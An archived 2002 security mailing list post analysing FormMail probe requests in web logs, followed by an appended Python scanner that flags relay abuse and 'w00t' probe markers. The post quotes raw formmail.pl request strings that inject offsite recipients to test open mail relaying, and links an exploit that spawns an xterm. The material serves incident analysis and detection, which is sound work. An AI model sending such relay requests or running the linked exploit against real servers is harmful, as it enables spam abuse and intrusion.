Security Incidents mailing list archives

RE: Matt Wright FormMail Attacks


From: Jose Nazario <jose () biocserver BIOC cwru edu>
Date: Mon, 14 Jan 2002 13:19:28 -0500 (EST)

On Mon, 14 Jan 2002, Turner, Keith wrote:

 My guess is one of the following: 1) Someone looking to send spam
through someone else's webserver. (Seems like that would be very
inefficient).  2) Someone looking for a new exploit, maybe testing the
waters for a new worm. 3) Someone looking for a way to "forge" emails.
make it look like it came from an email address of the affected
domain.  The email header would go right back to an address in the
"forged" domain.

my formmail attacks have this general structure:

GET /cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t

recipients have been:

c0mik () hotmail com (msg=w00t)
jersyvips () aol com (again, msg=w00t)
w00tw00t () yahoo com (yet again, msg=w00t)
Heyheyremeberme9 () aol com (msg=w00t)
GUILTYBIZ () aol com (msg=w00t)

i don't know if any of those accounts are valid.

those are just in the past 10,000 lines or so from my error logs (i don't
use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is
L33T and all), doubtful it's just simply spam but rather 'hey, this site's
got vulnerable cgi-bin stuff'.

spawn an xterm using formmail:
http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl

view env vars using formmail:
http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt

but i did find that others have been seeing this same basic pattern:

web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt
/cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t
/cgi-bin/formmail.pl?recipient=rmitchell9601 () aol com,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresonee () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl
/cgi-bin/formmail.pl?recipient=rmitchell9601 () aol com,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordee () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl

http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en
1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"

etc etc ... formmail + w00t on google brings up a bunch. from a few
more lists, more discussion:

http://ntbugtraq.net/archive/107/244789
http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html

hope this helps. it's a bit older, and not a highly visible item, but it's
real.

____________________________
jose nazario                                                 jose () cwru edu
                     PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
                                       PGP key ID 0xFD37F4E5 (pgp.mit.edu)


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
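A defender's view of the log pattern discussed in this message, as an added example that is not code from the thread, from FormMail, or from any of the linked advisories: it parses Apache combined-format access log lines, picks out requests for formmail.pl, percent-decodes the recipient/email/subject/msg parameters, and flags the two things the message points at, a recipient outside the domains the server should ever be mailing for (the relay test) and the scanner markers (msg=w00t, and the host's own script path echoed into the subject so the sender can tell from the mail it receives which host relayed). The sample log lines, hostnames, addresses and the set of local domains are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined format, modelled on the entries
# quoted in the thread; hosts and addresses here are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Eexample%2Ecom%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"
10.0.0.6 - - [05/Dec/2001:00:12:44 +0100] "GET /cgi-bin/formmail.pl?recipient=rmitchell9601%40aol%2Ecom,&subject=are%20you%20interested&email=someone%40example%2Enet HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.7 - - [05/Dec/2001:00:15:02 +0100] "GET /cgi-bin/formmail.pl?recipient=webmaster%40example%2Ecom&subject=Contact&email=visitor%40example%2Eorg HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.8 - - [05/Dec/2001:00:16:10 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
"""

# Client, two ident/user fields, timestamp, then the quoted request line.  The
# request field is matched loosely ([^"]*) because scanners sometimes push odd
# trailing bytes into it, as the "HTTP/1.1Content-Type: ..." line above shows.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_formmail_request(line):
    """Return the decoded FormMail parameters of one log line, or None when
    the line is not a request for formmail.pl."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("formmail.pl"):
        return None
    # parse_qs percent-decodes keys and values, so %40 -> '@' and %2E -> '.'
    params = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    # FormMail accepts a comma-separated recipient list; scanners often leave a
    # trailing comma, which would otherwise yield an empty address.
    recipients = [r.strip() for r in params.get("recipient", "").split(",") if r.strip()]
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "recipients": recipients,
        "sender": params.get("email", ""),
        "subject": params.get("subject", ""),
        "msg": params.get("msg", ""),
    }


def classify(req, local_domains):
    """List the reasons a FormMail request looks like relay abuse or a probe.
    local_domains is the (assumed) set of domains this server may mail for."""
    reasons = []
    offsite = [r for r in req["recipients"]
               if r.rpartition("@")[2].lower() not in local_domains]
    if offsite:
        reasons.append("offsite recipient")
    if req["msg"].lower() == "w00t":
        reasons.append("probe marker: msg=w00t")
    if "formmail.pl" in req["subject"].lower():
        reasons.append("probe marker: script path echoed in subject")
    return reasons


def scan_log(text, local_domains):
    """Return one finding per suspicious formmail.pl request in the log text."""
    findings = []
    for line in text.splitlines():
        req = parse_formmail_request(line)
        if req is None:
            continue
        reasons = classify(req, local_domains)
        if reasons:
            findings.append({**req, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, {"example.com"}):
        print(f["time"], f["client"], f["status"],
              ", ".join(f["recipients"]), "->", "; ".join(f["reasons"]))
```

The status code is kept in each finding because it tells the two cases apart: a 404 (or a hit in the error log, as in this message) means the script was not there and the request only identifies the scanner, whereas a 200 on a live formmail.pl with an offsite recipient means mail most likely left the box. Feeding the same scanner a domain set that includes aol.com drops the relay reason from the first line but keeps both probe markers, which is the point of separating the two checks.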

